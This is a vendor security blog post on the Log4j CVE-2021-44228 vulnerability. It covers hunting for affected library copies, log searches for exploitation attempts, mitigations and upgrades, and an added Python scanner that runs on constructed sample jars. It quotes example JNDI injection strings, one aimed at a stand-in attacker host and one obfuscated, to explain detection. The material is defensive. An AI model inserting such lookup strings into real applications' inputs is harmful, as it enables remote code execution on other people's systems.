Launch extended detection and response steps to manage Log4j vulnerability



OpenText Security Cloud Team

December 14, 2021 | 3 minutes read

Threat Hunts must include cloud, network, endpoint, log and email vectors

Note: OpenText™ Security reports that there is no Log4j impact on its EnCase suite of products including EnCase Endpoint Investigator, EnCase Endpoint Security, EnCase Forensic, EnCase Information Assurance, EnCase Mobile Investigator, and Tableau Forensic. See the latest OpenText Security Alert here.

Top US cybersecurity officials have warned of the zero-day vulnerability found in the Java logging library Apache Log4j.

ZDNet reports that the vulnerability, being tracked as CVE-2021-44228, is “severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library.”

It further writes that CERT New Zealand warns that it’s already being exploited in the wild.

Log4j is a popular Java library for logging messages in applications. Affected versions (2.0-beta9 through 2.14.1) evaluate lookup expressions such as ${jndi:ldap://attacker-host/x} embedded in the text being logged, so any remote attacker who can get a string into a log line (an HTTP header, a username, a chat message) can make the application fetch and execute attacker-supplied code.

“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of CISA said in a call shared with CNN. Easterly has spent 20 years in various federal cybersecurity roles. “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said. The call, with US critical infrastructure owners and operators, was first reported by CyberScoop.

Turn on breach mentality

Given the severity and urgency of the Log4j vulnerability, OpenText Security advises customers to assume breach and immediately initiate detection and response measures. Any anomaly should be checked for indicators of CVE-2021-44228 exploitation, and appropriate remediation and recovery measures activated where they are found.

As a first step to understanding the attack surface, customers of EnCase Endpoint Security can use the “Find Hosts with IOCs” capability to hunt for instances of log4j.jar files across the enterprise. Bear in mind that log4j-core is frequently embedded inside application archives (WAR and EAR files, shaded “fat” jars) rather than shipped as a stand-alone file, so a hunt keyed on the file name alone will miss copies; supplement it with a search on the library’s hashes or on the JndiLookup class it contains.

According to researchers at LunaSec, organizations can identify whether they are affected by examining the log files of any services that run affected Log4j versions for user-controlled strings containing JNDI lookups; CERT NZ gives the example “jndi:ldap”. Attackers obfuscate the string (nested lookups such as ${${lower:j}ndi:...}, URL-encoding, mixed case), so a search for the literal text “jndi:ldap” will miss many attempts; normalize the line before matching.

To mitigate, set the system property log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=true to the JVM command line that starts the application. This property is honoured only by Log4j 2.10 and later; for older 2.x releases Apache’s guidance is to remove the JndiLookup class from the log4j-core jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). To prevent the library from being exploited, it is urgently recommended that Log4j be upgraded to 2.15.0, the release that fixes CVE-2021-44228 (not the 2.15.0-rc1 release candidate, which it superseded). Apache has since published further releases (2.16.0 and the 2.17.x line) for follow-on issues, so treat 2.15.0 as a floor and follow the current Apache Log4j security advisory.
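As an added worked example that is not part of the original post or of any OpenText tool, the Python script below ties the hunting step and the mitigation step above together: it walks a directory tree, opens every jar/war/ear/zip (recursing into archives nested inside archives), identifies log4j-core by its Maven pom.properties entry or by the presence of the JndiLookup class, reads the version, and reports which mitigation applies using the thresholds stated above (2.15.0 fixed, the property honoured from 2.10, class removal for older 2.x). The sample archives it writes to a temporary directory are constructed stand-ins; the JndiLookup.class entry holds placeholder bytes, not real bytecode, and the file names and versions are chosen for the example.

```python
"""Find log4j-core copies on disk, including ones nested in other archives,
and report which mitigation each needs.  Added example, not OpenText code."""
import io
import os
import re
import tempfile
import zipfile
from typing import List, Tuple

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
Finding = Tuple[str, str, bool, str]   # path, version, has JndiLookup.class, advice


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0); unparseable -> ()."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return tuple(int(x) for x in m.groups() if x is not None) if m else ()


def advise(version: str, has_jndi_class: bool) -> str:
    """Map a log4j-core version to the mitigation described in the post."""
    v = parse_version(version)
    if v and v >= (2, 15):
        return "fixed for CVE-2021-44228; still track later Apache advisories"
    if not has_jndi_class:
        return "JndiLookup.class absent; message lookups cannot reach JNDI"
    if v and v >= (2, 10):
        return "vulnerable: set -Dlog4j2.formatMsgNoLookups=true, or upgrade"
    if v:
        return "vulnerable: flag not honoured before 2.10; delete JndiLookup.class, or upgrade"
    return "version unknown but JndiLookup.class present: treat as vulnerable"


def _version_of(zf: zipfile.ZipFile, names: set) -> str:
    """Read the version from log4j-core's own pom.properties (survives shading);
    a fat jar that dropped it reports 'unknown' and is treated as vulnerable."""
    if POM_PROPS in names:
        text = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(\S+)", text, re.M)
        if m:
            return m.group(1)
    return "unknown"


def _inspect(zf: zipfile.ZipFile, path: str, findings: List[Finding]) -> None:
    names = set(zf.namelist())
    has_jndi = JNDI_CLASS in names
    if has_jndi or POM_PROPS in names:
        version = _version_of(zf, names)
        findings.append((path, version, has_jndi, advise(version, has_jndi)))
    for name in sorted(names):                       # recurse into nested archives
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _inspect(inner, f"{path}!{name}", findings)
            except zipfile.BadZipFile:
                pass


def scan_tree(root: str) -> List[Finding]:
    """Walk root and inspect every archive found (outer path!inner path for nesting)."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                p = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(p) as zf:
                        _inspect(zf, p, findings)
                except zipfile.BadZipFile:
                    pass
    return findings


def _fake_log4j_core(version: str, with_jndi_class: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar (placeholder bytes, not bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi_class:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_sample(root: str) -> None:
    """Write constructed archives so the scanner can be exercised offline."""
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    samples = {"log4j-core-2.14.1.jar": ("2.14.1", True),
               "log4j-core-2.8.2.jar": ("2.8.2", True),
               "log4j-core-2.11.0-stripped.jar": ("2.11.0", False)}
    for name, (ver, keep) in samples.items():
        with open(os.path.join(root, "lib", name), "wb") as f:
            f.write(_fake_log4j_core(ver, keep))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:   # patched copy, nested
        war.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", _fake_log4j_core("2.15.0"))


def demo() -> dict:
    """Build the sample tree, scan it, and return {relative path: advice}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): adv
                for p, _, _, adv in scan_tree(root)}


if __name__ == "__main__":
    for path, advice in demo().items():
        print(f"{path}: {advice}")
```

Two design choices matter in practice: the version is taken from log4j-core’s own pom.properties rather than the archive’s MANIFEST.MF, because in a shaded jar the manifest describes the application, not the library; and a copy whose version cannot be determined but still contains JndiLookup.class is reported as vulnerable rather than skipped.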

The Log4j vulnerability detection pack is now available for EnCase Endpoint Security.

This detection pack includes filters that will locate the presence of vulnerable versions of Log4j using hashes, as well as searches that detect active and past exploitations based on Indicators of Compromise (IOCs).

Customers and partners can download the detection pack and documentation from the OpenText My Support website here.

Talk to one of our security experts for more information.
